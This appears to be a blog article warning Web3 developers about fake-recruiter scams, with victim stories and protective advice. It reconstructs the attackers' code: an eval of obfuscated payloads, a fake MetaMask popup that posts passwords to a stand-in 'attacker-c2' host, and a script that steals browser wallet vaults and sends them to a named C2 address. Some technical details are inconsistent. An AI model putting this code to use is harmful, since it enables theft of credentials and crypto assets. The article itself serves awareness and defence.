Web3 Developer Scams: Real Stories from Real Victims
The Web3 ecosystem is being actively targeted by sophisticated attackers. These aren’t random hackers exploiting vulnerabilities from afar—they’re social engineers who build elaborate fake job offers, investment opportunities, and collaborative projects to scam developers into executing malicious code on their own machines.
This article compiles real stories from developers who were targeted, attacked, and in some cases, lost significant assets. Their experiences reveal the attack vectors, technical execution, and—most importantly—how to protect yourself.
The Recruiter Approach: A Web3 Developer’s Nightmare
Story 1: Abdivokhidov’s Experience
Ibrohim Abdivokhidov (Abdibrokhim), a software engineer, received a LinkedIn message from someone claiming to represent a Web3 development company. The conversation started innocuously enough:
- Initial contact: “We saw your profile and think you’d be a great fit for our blockchain project.”
- The offer: Competitive compensation, remote work, cutting-edge Web3 tech
- The task: Complete a coding challenge as part of the interview process
After several messages moved to Slack, Abdivokhidov was invited to a private GitHub repository containing what appeared to be a Web3 online chess game. The task: connect a MetaMask wallet and execute the code locally.
Red flags he missed:
- The repository was under his own GitHub account (not the company’s)
- The README.md contained suspicious instructions about wallet connections
- Chain ID in the code pointed to an invalid network (0x61)
The Technical Attack Vector
Here’s what happened when he ran npm run dev:
// In package.json, the script runs:
// node server/app.js
// In app.js, there is:
const data = util.assets();
eval(data); // DANGEROUS: Executes arbitrary string as code
// util.assets() loads obfuscated SVG files from:
// public/models/.svn/bower_components/assets
// These SVG files contain JavaScript payload
The malicious code performed several actions:
- Extracted browser extension data: Accessed Chrome profile directories to find MetaMask storage
- Targeted MetaMask specifically: Located at
nkbihfogbeogaeaoehlefnkodbefgpgknn/ - Exfiltrated encrypted secrets: Sent encrypted vault data to C2 server (94.131.97.195:1224)
Second Attack: The Screen Share Deception
After the code execution, the attackers scheduled a video call. During the call, they asked Abdivokhidov to “Connect Wallet” to demonstrate that the app worked. When he tried, what appeared to be MetaMask was actually:
// The fake MetaMask popup:
window.ethereum = {
request: async function(params) {
if (params.method === "eth_requestAccounts") {
// Show fake password popup
const password = await getUserPassword();
// Send password to attacker C2
await fetch("https://attacker-c2/steal", {
method: "POST",
body: JSON.stringify({ password })
});
// Also execute original MetaMask to seem legitimate
return originalEthereum.request(params);
}
}
};
By the time he realized what happened, his wallet secrets had been:
- Exfiltrated during
npm run dev(encrypted vault) - Decrypted using the password he entered on the fake MetaMask popup
- Used to drain all assets
Story 2: Mameta29 (zkTokyo) – The Japanese Developer
Mameta29, a blockchain engineer based in Tokyo, shared a similar experience on Zenn.dev. The attackers approached him through LinkedIn with what appeared to be a legitimate overseas project opportunity.
The critical moment:
“I was asked to share my screen to explain the project. When the ‘Connect Wallet’ dialog appeared, I noticed it wasn’t the real MetaMask—it was an embedded HTML form styled to look exactly like MetaMask.”
He immediately recognized the attack and refused to enter his password, but the damage could have been catastrophic if he hadn’t been paying attention.
Key Lessons from Mameta29:
- Never connect a wallet during an interview or test task
- Always verify the URL domain before entering any credentials
- Use a separate browser profile or sandbox for any “test” wallet connections
- If something feels off, it probably is
Story 3: The Token Voting App (Abdivokhidov, Second Attack)
Just weeks after the first attack, Abdivokhidov received another suspicious offer. This time, someone named “Jaime Jorge Martinez Agredano” reached out about a “Token Voting App” project.
Suspicious indicators:
- GitHub account was only 3 weeks old
- Company website (nerdunited.com) had no verifiable presence
- Extreme insistence on confidentiality (“Don’t share this with anyone”)
- The repository was private and removed shortly after
This pattern suggests these are coordinated campaigns, not isolated incidents.
The Lazarus Connection: State-Sponsored Attackers
According to multiple blockchain engineers on X (Twitter), these attacks are linked to the North Korean Lazarus Group—a state-sponsored hacking organization known for targeting cryptocurrency exchanges and DeFi protocols.
Why Web3 developers?
- High-value targets (crypto holdings)
- Often work remotely with access to multiple networks
- May have access to DeFi protocols, bridge keys, or enterprise wallets
- The skills gap between traditional Web2 and Web3 security
C2 Server identified: 94.131.97.195:1224
Anatomy of the Attack: Step by Step
Phase 1: Reconnaissance
Attackers identify targets through:
- LinkedIn profiles (especially “Web3 Developer”, “Blockchain Engineer”)
- GitHub contributions to public repos
- Conference talks and blog posts
- Discord and Telegram communities
Phase 2: Initial Contact
Typically involves:
- Fake LinkedIn profiles with AI-generated photos
- Appealing job offers with competitive salaries
- Claims of prestigious companies (often fictional)
Phase 3: Trust Building
The attacker:
- Moves conversation to private platforms (Slack, Discord, Telegram)
- Sends a GitHub repository invite
- Provides detailed “task” instructions
- Creates time pressure (“Complete in 1 hour”)
Phase 4: Execution
When you run npm install && npm run dev:
// The malicious package.json script executes:
// node server/app.js
// app.js contains:
const fs = require("fs"); // File system access
const os = require("os"); // OS information
const path = require("path"); // Path traversal
const request = require("request"); // HTTP requests
// Searches for browser profiles:
const browserPaths = [
path.join(os.homedir(), ".config/google-chrome"),
path.join(os.homedir(), ".config/BraveSoftware"),
path.join(os.homedir(), ".mozilla/firefox")
];
// Locates MetaMask extension:
const metamaskPath = "nkbihfbeogaeaoehlefnkodbefgpgknn/Local Extension Settings";
// Exfiltrates to C2:
await request.post("https://94.131.97.195:1224/steal", {
body: JSON.stringify({
vault: encryptedMetaMaskData,
profile: browserProfile,
extensions: extensionsList
})
});
Phase 5: Credential Harvesting
During the video call:
- Attacker requests screen share or “Connect Wallet”
- Fake MetaMask popup appears
- User enters password
- Attacker decrypts stolen vault data
- All assets transferred out
How to Protect Yourself
Before Any Interview or Task
- Verify the company: Check LinkedIn, Crunchbase, official website
- Research the recruiter: Reverse image search profile photos, check connection depth
- Use a dedicated environment: Never use your main machine for “test tasks”
When Reviewing Code
- Always audit package.json scripts before running anything
- Check for eval(), require() with external modules, fs operations
- Run in a VM or container, never on your host machine
- Use network monitoring to detect suspicious outbound connections
Before Connecting a Wallet
- Never connect a wallet for “testing” in an interview context
- Verify the URL is exactly what you expect ( attackers use typosquatting)
- Use a burner wallet with no assets if you must test
- Disconnect immediately after any wallet interaction
Environment Hardening
// Best practices for Web3 development:
1. Use separate browser profiles for development
2. Never store significant assets in browser extensions
3. Use hardware wallets (Ledger, Trezor) for all holdings
4. Enable 2FA on all exchange and wallet accounts
5. Use a password manager with unique passwords
6. Consider a dedicated "hot wallet" machine for development
7. Regularly audit installed browser extensions
8. Use network-level blocking (Pi-hole) to block known C2 domains
Red Flags to Watch For
| Red Flag | Why It’s Dangerous |
|---|---|
| Request to run npm run dev | Could execute malicious backend code |
| Invite to a private GitHub repo under your account | Attacker can delete and frame you |
| Time pressure (“Complete in 1 hour”) | Prevents careful code review |
| Move to Slack/Discord immediately | Platforms with less moderation |
| Request to connect wallet | Direct path to asset theft |
| Company has no verifiable online presence | Probably doesn’t exist |
Community Response
Several developers have taken action:
- EdamAmex: Posted multiple issues warning about malicious repositories, but noted: “There are many similar repositories, it seems pointless to do this for all of them.”
- Cheena: Publicly identified the C2 server and Lazarus Group connection
- GitHub: Has been removing reported malicious repositories, but new ones appear constantly
What the Industry Needs
- Better developer education on social engineering attacks
- Safer coding environments (containerized, sandboxed by default)
- Wallet security improvements that prevent silent key extraction
- Cross-platform threat intelligence sharing
Conclusion
The Web3 space attracts not just legitimate builders, but also sophisticated attackers who view developers as high-value targets. These attacks are:
- Targeted: Not random, carefully selected victims
- Technical: Sophisticated code execution and credential harvesting
- Coordinated: Multiple attackers, consistent methodologies
- Evolving: New variants and techniques emerging regularly
The best defense is awareness. If you understand how these attacks work, you can recognize the warning signs and protect yourself.
Have you been targeted? Share your story to help others stay safe. You can also help us share your story with others by writing to us at editor@blockcritics.com
Found a malicious repository? Report it to GitHub, warn the community, and document the attack vector.
